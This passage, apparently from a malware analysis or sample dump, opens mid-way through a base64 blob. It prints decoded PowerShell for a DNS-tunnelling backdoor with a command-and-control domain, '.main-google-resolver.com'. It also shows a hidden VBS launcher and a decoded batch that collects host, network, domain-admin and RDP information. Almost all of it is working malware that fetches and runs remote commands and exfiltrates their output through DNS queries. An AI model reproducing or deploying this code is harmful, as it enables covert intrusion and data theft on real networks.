sADQAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBtAGEAaQBuAGQAZQByACAAPQAgACgAJABkAGUAYwBOAHUAbQAgACUAIAAzADYAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABjAGgAYQByACAAPQAgACQAYQBsAHAAaABhAGIAZQB0AC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAkAHIAZQBtAGEAaQBuAGQAZQByACwAMQApADsADQAKACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUAMwA2AE4AdQBtACAAPQAgACIAJABjAGgAYQByACQAYgBhAHMAZQAzADYATgB1AG0AIgA7AA0ACgAgACAAIAAgACAAIAAgACAAJABkAGUAYwBOAHUAbQAgAD0AIAAoACQAZABlAGMATgB1AG0AIAAtACAAJAByAGUAbQBhAGkAbgBkAGUAcgApACAALwAgADMANgA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAdwBoAGkAbABlACAAKAAkAGQAZQBjAE4AdQBtACAALQBnAHQAIAAwACkAOwANAAoAIAAgACAAIAAkAGIAYQBzAGUAMwA2AE4AdQBtAC4AUABhAGQATABlAGYAdAAoADMALAAnADAAJwApADsADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AFMAdQBiACgAJABtAHkAZgBsAGEAZwAyACwAIAAkAGMAbQBkAGkAZAA9ACcAMAAwACcALAAgACQAcABhAHIAdABpAGQAPQAnADAAMAAwACcAKQANAAoAewANAAoAIAAgACAAIABpAGYAKAAkAG0AeQBmAGwAYQBnADIAIAAtAGUAcQAgADAAKQANAAoAIAAgACAAIAB7AA0ACgAJAAkAKAAnAHoAegAwADAAMAAwADAAMAAnACsAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBhAHgAaQBtAHUAbQAgADQANgA2ADUANQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAG0AeQBmAGwAYQBnADIAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAHoAegAnACsAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAKwAnADAAMAAwADAAMAAnACsAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBhAHgAaQBtAHUAbQAgADQANgA2ADUANQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAG0AeQBmAGwAYQBnADIAIAAtAGUAcQAgADIAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAHoAegAnACsAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAKwAkAGMAbQBkAGkAZAArACQAcABhAHIAdABpAGQAKwAoAGMAbwBuAHYAZQByAHQAVABvAC0AQgBhAHMAZQAzADYAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAANAA2ADYANQA1ACkAKQApADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAMgBIAGUAeAAoACQAbQB5AHMAdAByACkADQAKAHsADQAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAkAG0AeQBzAHQAcgApACkALgBSAGUAcABsAGEAYwBlACgAIgAtACIALAAgACIAIgApADsADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAEEAbABpAHYAZQANAAoAewANAAoACQBpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAJwAjACcAKwAnACMAIwAnACkADQAKAAkAewANAAoACQAJAHIAZQB0AHUAcgBuACAAMAA7AA0ACgAJAH0ADQAKACAAIAAgACAAUwBlAG4AZABSAGUAYwBlAGkAdgBlAEQATgBTACAAKAAoAEcAZQB0AFMAdQBiACAAMQApACsAJwAzADAAJwApADsADQAKACAAIAAgACAAJABzAHUAYgAgAD0AIAAoACgARwBlAHQAUwB1AGIAIAAxACkAKwAnADIAMwAyAEEAJwApACAAKwAgACgAUwB0AHIAMgBIAGUAeAAgACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAKQA7AA0ACgAgACAAIAAgACQAaQAgAD0AIAAxADsADQAKACAAIAAgACAAJAByAGUAdAAgAD0AIAAwADsADQAKACAAIAAgACAAdwBoAGkAbABlACgAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAALQBlAHEAIAAxACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHQAIAA9ACAAMQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABzAHUAYgAyACAAPQAgACQAcwB1AGIAIAArACAAKABTAHQAcgAyAEgAZQB4ACAAJABpACkAOwANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACQAcwB1AGIAMgA7AA0ACgAgACAAIAAgACAAIAAgACAAJABpACsAKwA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAdAAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIABGAGkAeABCAGEAdABGAGkAbABlACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAIgAuAGIAYQB0ACIAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAdAA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAoACQAZAApAA0ACgB7AA0ACgAJACQAYwBuAHQAIAA9ACAAMAA7AA0ACgAJAHcAaABpAGwAZQAgACgAJABjAG4AdAAgAC0AbAB0ACAAMgAwACkADQAKAAkAewANAAoACQAJAHQAcgB5AA0ACgAJAAkAewANAAoACQAJAAkAJABtAHkAZABhAHQAYQAgAD0AIAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEQATgBTAF0AOgA6AEcAZQB0AEgAbwBzAHQAQgB5AE4AYQBtAGUAKAAkAGQAKwAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBzAHQAKQAuAEEAZABkAHIAZQBzAHMATABpAHMAdABbADAAXQApADsADQAKAAkACQAJACQAbQB5AGQAYQB0AGEAIAA9ACAAKAAkAG0AeQBkAGEAdABhACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJABfAC4ASQBQAEEAZABkAHIAZQBzAHMAVABvAFMAdAByAGkAbgBnAH0AKQA7AA0ACgAJAAkACQAkAGMAbgB0ACAAPQAgADIANQA7AA0ACgAJAAkAfQANAAoACQAJAGMAYQB0AGMAaAANAAoACQAJAHsADQAKAAkACQAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AbQAgADUAMAAwADsADQAKAAkACQAJACQAYwBuAHQAKwArADsADQAKAAkACQB9AA0ACgAJAH0ADQAKACAAIAAgACAAaQBmACgALQBuAG8AdAAoACQAYwBuAHQAIAAtAGUAcQAgADIANQApACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwAjACcAKwAnACMAIwAnACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAALQBlAHEAIAAwACAALQBhAG4AZAAgACQAbQB5AGQAYQB0AGEALgBTAHQAYQByAHQAcwBXAGkAdABoACgAJwAzADMALgAzADMALgAnACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB0AG0AcAAgAD0AIAAkAG0AeQBkAGEAdABhAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA2ACkALgBTAHAAbABpAHQAKAAnAC4AJwApADsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACAAPQAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMABdACkAIAArACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAxAF0AKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAAPQAgADEAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAkAG0AeQBkAGEAdABhAC4ARQBxAHUAYQBsAHMAKAAnADMANQAuADMANQAuADMANQAuADMANQAnACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAAPQAgADAAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB0AG0AcAAgAD0AIAAkAG0AeQBkAGEAdABhAC4AUwBwAGwAaQB0ACgAJwAuACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAQQBwAHAAZQBuAGQAQQBsAGwAVABlAHgAdAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAG0AZQArACcAdABwAFwAJwArACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAKwAiAC4AYgBhAHQAIgAsACAAKAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADAAXQApACAAKwAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMQBdACkAIAArACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAyAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADMAXQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAJwAjACcAKwAnACMAIwAnACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAG0AeQBkAGEAdABhAC4AUwBwAGwAaQB0ACgAJwAuACcAKQBbADAAXQApADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAARgBpAHgAQgBhAHQARgBpAGwAZQAgACgAJABiAGEAdABwAGEAdABoACkADQAKAHsADQAKACAAIAAgACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIAYQB0AHAAYQB0AGgAKQAuAFMAdQBiAHMAdAByAGkAbgBnACgAMQAwACkAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABiAGEAdABwAGEAdABoADsADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAZQBuAGQARgBpAGwAZQAoACQAbQB5AEYAaQBsAGUAUABhAHQAaAApAA0ACgB7AA0ACgAgACAAIAAgACQAbQB5AEYAaQBsAGUATgBhAG0AZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABGAGkAbABlAE4AYQBtAGUAVwBpAHQAaABvAHUAdABFAHgAdABlAG4AcwBpAG8AbgAoACQAbQB5AEYAaQBsAGUAUABhAHQAaAApADsADQAKACAAIAAgACAAJABtAHkAcwB0AHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABUAGUAeAB0ACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkAOwANAAoAIAAgACAAIAAkAGkAPQAwADsADQAKACAAIAAgACAAJABtAHkAdABlAG0AcAAgAD0AIAAnACcAOwANAAoAIAAgACAAIAAkAGoAPQAwADsADQAKACAAIAAgACAAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAkAG0AeQBzAHQAcgAuAEwAZQBuAGcAdABoACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbQB5AHQAZQBtAHAAIAArAD0AIAAkAG0AeQBzAHQAcgBbACQAaQBdADsADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAoACgAJABpACUAMgA0ACkAIAAtAGUAcQAgADIAMwApACAALQBvAHIAIAAoACQAaQAgAC0AZQBxACAAJABtAHkAcwB0AHIALgBMAGUAbgBnAHQAaAApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG0AeQBoAGUAeAAgAD0AIABTAHQAcgAyAEgAZQB4ACAAJABtAHkAdABlAG0AcAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAoACgARwBlAHQAUwB1AGIAIAAyACAAJABtAHkARgBpAGwAZQBOAGEAbQBlACAAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACAAJABqACkAKQAgACsAIAAkAG0AeQBoAGUAeAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAagArACsAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABtAHkAdABlAG0AcAAgAD0AIAAnACcAOwANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAkAGkAKwArADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAARwBlAHQASQBEAA0ACgB7AA0ACgAJACQAdgBhAGwAaQBkAGMAaABhAHIAcwAgAD0AIAAiADAAMQAyADMANAA1ADYANwA4ADkAQQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUABRAFIAUwBUAFUAVgBXAFgAWQBaAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcQByAHMAdAB1AHYAdwB4AHkAegAiADsADQAKACAAIAAgACAAJAB0AGkAZAAgAD0AIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAoACgARwBlAHQAUwB1AGIAIAAwACkAKwAnADMAMAAnACkAOwANAAoACQBpAGYAIAAoACQAdgBhAGwAaQBkAGMAaABhAHIAcwAuAEMAbwBuAHQAYQBpAG4AcwAoACQAdABpAGQAKQApAHsAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAPQAkAHQAaQBkADsAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAAQwBoAGEAbgBnAGUAVABoAGkAcwBGAGkAbABlACAAKAAkAGIAbwB0AGkAZAApAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAKAAnACMAJwArACcAIwAjACcAKQApACkADQAKACAAIAAgACAAewANAAoACQAJACQAZgBjAD0AKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAFIAZQBjAG8AcgBkAGUAZABUAFYAXABEAG4AUwAuAHAAcwAxACAALQBFAG4AYwBvAGQAaQBuAGcAIABBAHMAYwBpAGkAKQA7AA0ACgAJAAkAJABmAGMAPQAkAGYAYwAuAFMAdQBiAFMAdAByAGkAbgBnACgAJABmAGMALgBJAG4AZABlAHgATwBmACgAJwBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABcACIAJwApACsAMgA5ACkALgBUAHIAaQBtAEUAbgBkACgAJwBcACIAJwApADsADQAKAAkACQAkAGYAYwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAYwApACkAOwANAAoACQAJACQAZgBjAD0AJABmAGMAIAAtAHIAZQBwAGwAYQBjAGUAIAAoACcAIwAnACsAJwAjACMAJwApACwAJABiAG8AdABpAGQAOwANAAoACQAJACQAZgBjAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZgBjACkAKQA7AA0ACgAJAAkAJABmAGMAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAJwArACQAZgBjACsAJwAiACcAOwANAAoACQAJAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcAEQAbgBTAC4AcABzADEAIAAkAGYAYwAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpADsADQAKAAkAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdAANAAoAewANAAoAIAAgACAAIABpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAKAAnACMAJwArACcAIwAjACcAKQApAA0ACgAgACAAIAAgAHsADQAKAAkACQBtAGQAIAAtAEYAbwByAGMAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACkAOwANAAoACQAJAEcAZQB0AEkARAA7AA0ACgAJAAkAQwBoAGEAbgBnAGUAVABoAGkAcwBGAGkAbABlACAAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABtAGEAaQBuAA0ACgB7AA0ACgAgACAAIAAgAEkAbgBpAHQAOwANAAoAIAAgACAAIABpAGYAKABBAGwAaQB2AGUAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACAAPgAgACcAKwAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUwBlAG4AZABGAGkAbABlACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAG0AYQBpAG4AOwANAAoA"

    decodes to:
    $global:myhost = '.main-google-resolver.com';
    $global:filename = '';
    $global:myflag = 0;
    $global:myid = '###';
    $global:myhome = "$env:Public\Libraries\RecordedTV\";
    function convertTo-Base36 ($decNum="")
    {
    $decNum %= 46656;
    $alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    do
    {
    $remainder = ($decNum % 36);
    $char = $alphabet.substring($remainder,1);
    $base36Num = "$char$base36Num";
    $decNum = ($decNum - $remainder) / 36;
    }
    while ($decNum -gt 0);
    $base36Num.PadLeft(3,'0');
    }
    function GetSub($myflag2, $cmdid='00', $partid='000')
    {
    if($myflag2 -eq 0)
    {
    ('zz000000'+(convertTo-Base36(Get-Random -Maximum 46655)));
    }
    elseif($myflag2 -eq 1)
    {
    ('zz'+$global:myid+'00000'+(convertTo-Base36(Get-Random -Maximum 46655)));
    }
    elseif($myflag2 -eq 2)
    {
    ('zz'+$global:myid+$cmdid+$partid+(convertTo-Base36(Get-Random -Maximum 46655)));
    }
    }
    function Str2Hex($mystr)
    {
    [System.BitConverter]::ToString([System.Text.Encoding]::Default.GetBytes($mystr)).Replace("-", "");
    }
    function Alive
    {
    if($global:myid -eq '#'+'##')
    {
    return 0;
    }
    SendReceiveDNS ((GetSub 1)+'30');
    $sub = ((GetSub 1)+'232A') + (Str2Hex $global:filename);
    $i = 1;
    $ret = 0;
    while($global:myflag -eq 1)
    {
    $ret = 1;
    $sub2 = $sub + (Str2Hex $i);
    SendReceiveDNS $sub2;
    $i++;
    }
    if($ret -eq 1)
    {
    FixBatFile ($global:myhome+'tp\'+$global:filename+".bat");
    }
    $ret;
    }
    function SendReceiveDNS ($d)
    {
    $cnt = 0;
    while ($cnt -lt 20)
    {
    try
    {
    $mydata = ([System.Net.DNS]::GetHostByName($d+$global:myhost).AddressList[0]);
    $mydata = ($mydata | ForEach-Object {$_.IPAddressToString});
    $cnt = 25;
    }
    catch
    {
    Start-Sleep -m 500;
    $cnt++;
    }
    }
    if(-not($cnt -eq 25))
    {
    ('#'+'##');
    }
    elseif($global:myflag -eq 0 -and $mydata.StartsWith('33.33.'))
    {
    $tmp = $mydata.SubString(6).Split('.');
    $global:filename = ([char] [int] $tmp[0]) + ([char] [int] $tmp[1]);
    $global:myflag = 1;
    }
    elseif ($mydata.Equals('35.35.35.35'))
    {
    $global:myflag = 0;
    }
    elseif ($global:myflag -eq 1)
    {
    $tmp = $mydata.Split('.');
    [System.IO.File]::AppendAllText($global:myhome+'tp\'+$global:filename+".bat", (([char] [int] $tmp[0]) + ([char] [int] $tmp[1]) + ([char] [int] $tmp[2]) + ([char] [int] $tmp[3])));
    }
    elseif($global:myid -eq '#'+'##')
    {
    ([char] [int] $mydata.Split('.')[0]);
    }
    }
    function FixBatFile ($batpath)
    {
    (Get-Content $batpath).Substring(10) | Set-Content $batpath;
    }
    function SendFile($myFilePath)
    {
    $myFileName = [System.IO.Path]::GetFileNameWithoutExtension($myFilePath);
    $mystr = [System.IO.File]::ReadAllText($myFilePath);
    $i=0;
    $mytemp = '';
    $j=0;
    while($i -le $mystr.Length)
    {
    $mytemp += $mystr[$i];
    if((($i%24) -eq 23) -or ($i -eq $mystr.Length))
    {
    $myhex = Str2Hex $mytemp;
    SendReceiveDNS ((GetSub 2 $myFileName (convertTo-Base36 $j)) + $myhex);
    $j++;
    $mytemp = '';
    }
    $i++;
    }
    }
    function GetID
    {
    $validchars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    $tid = SendReceiveDNS ((GetSub 0)+'30');
    if ($validchars.Contains($tid)){$global:myid=$tid;}
    }
    function ChangeThisFile ($botid)
    {
    if(-not($global:myid -eq ('#'+'##')))
    {
    $fc=(Get-Content $env:Public\Libraries\RecordedTV\DnS.ps1 -Encoding Ascii);
    $fc=$fc.SubString($fc.IndexOf('powershell -EncodedCommand \"')+29).TrimEnd('\"');
    $fc=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($fc));
    $fc=$fc -replace ('#'+'##'),$botid;
    $fc=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($fc));
    $fc='powershell -EncodedCommand "'+$fc+'"';
    Set-Content $env:Public\Libraries\RecordedTV\DnS.ps1 $fc -Encoding Ascii;
    }
    }
    function Init
    {
    if($global:myid -eq ('#'+'##'))
    {
    md -Force ($global:myhome+'tp\');
    GetID;
    ChangeThisFile $global:myid;
    }
    }
    function main
    {
    Init;
    if(Alive -eq 1)
    {
    Invoke-Expression ($global:myhome+'tp\'+$global:filename+'.bat > '+$global:myhome+'tp\'+$global:filename+'.txt');
    SendFile ($global:myhome+'tp\'+$global:filename+'.txt');
    Remove-Item ($global:myhome+'tp\'+$global:filename+'.bat');
    Remove-Item ($global:myhome+'tp\'+$global:filename+'.txt');
    }
    }
    main;

    ---------------------------------- backup.vbs ----------------------------------
    In Cell X1
    HOME="%public%\Libraries\RecordedTV\"
    DnECmd="powershell -ExecutionPolicy Bypass -File "&HOME&"DnE.ps1"
    CreateObject("WScript.Shell").Run DnECmd,0
    DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"DnS.ps1"
    CreateObject("WScript.Shell").Run DnsCmd,0


    ---------------------------------- ----------------------------------

    QGVjaG8gb2ZmJmNoY3AgNjUwMDEmIHdob2FtaSAyPiYxICYgaG9zdG5hbWUgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19JcENvbmZpZ19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIGlwY29uZmlnIC9hbGwgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19Eb21pYW4gQWRtaW5zX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIG5ldCBncm91cCAiZG9tYWluIGFkbWlucyIgL2RvbWFpbiAyPiYxICYgZWNobyBfX19fX19fX19fX19fX19fX19fX19fX25ldCBsb2NhbCBncm91cCBtZW1iZXJzX19fX19fX19fX19fX19fX19fX19fX19fICYgbmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19uZXRzdGF0X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIG5ldHN0YXQgLWFuIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fc3lzdGVtaW5mb19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiBzeXN0ZW1pbmZvIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fUkRQX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiByZWcgcXVlcnkgIkhLRVlfQ1VSUkVOVF9VU0VSXFNvZnR3YXJlXE1pY3Jvc29mdFxUZXJtaW5hbCBTZXJ2ZXIgQ2xpZW50XERlZmF1bHQiIDI+JjEgJiBlY2hvIF9fX19fX19fX19fX19fX19fX19fX19fX19fX19DdXN0b20gQ29tbWFuZF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18gJiB3bWljIG9zIGdldCBDYXB0aW9uIC92YWx1ZSB8IG1vcmUgMj4mMSAmIGVjaG8gX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19UYXNrX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyAmIHNjaHRhc2tzIC9xdWVyeSAvRk8gTGlzdCAvVE4gIkdvb2dsZVVwZGF0ZVRhc2tzTWFjaGluZVVJIiAvViB8IGZpbmRzdHIgL2IgL24gL2M6IlJlcGVhdDogRXZlcnk6IiAyPiYxICYgZWNobyBfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fIA==
    decodes to:

    @echo off&chcp 65001& whoami 2>&1 & hostname 2>&1 & echo ________________________________IpConfig______________________________ & ipconfig /all 2>&1 & echo __________________________Domian Admins_______________________________ & net group "domain admins" /domain 2>&1 & echo _______________________net local group members________________________ & net localgroup administrators 2>&1 & echo ________________________________netstat_______________________________ & netstat -an 2>&1 & echo _____________________________systeminfo_______________________________ & systeminfo 2>&1 & echo ________________________________RDP___________________________________ & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1 & echo ____________________________Custom Command_______________________________ & wmic os get Caption /value | more 2>&1 & echo ________________________________Task__________________________________ & schtasks /query /FO List /TN 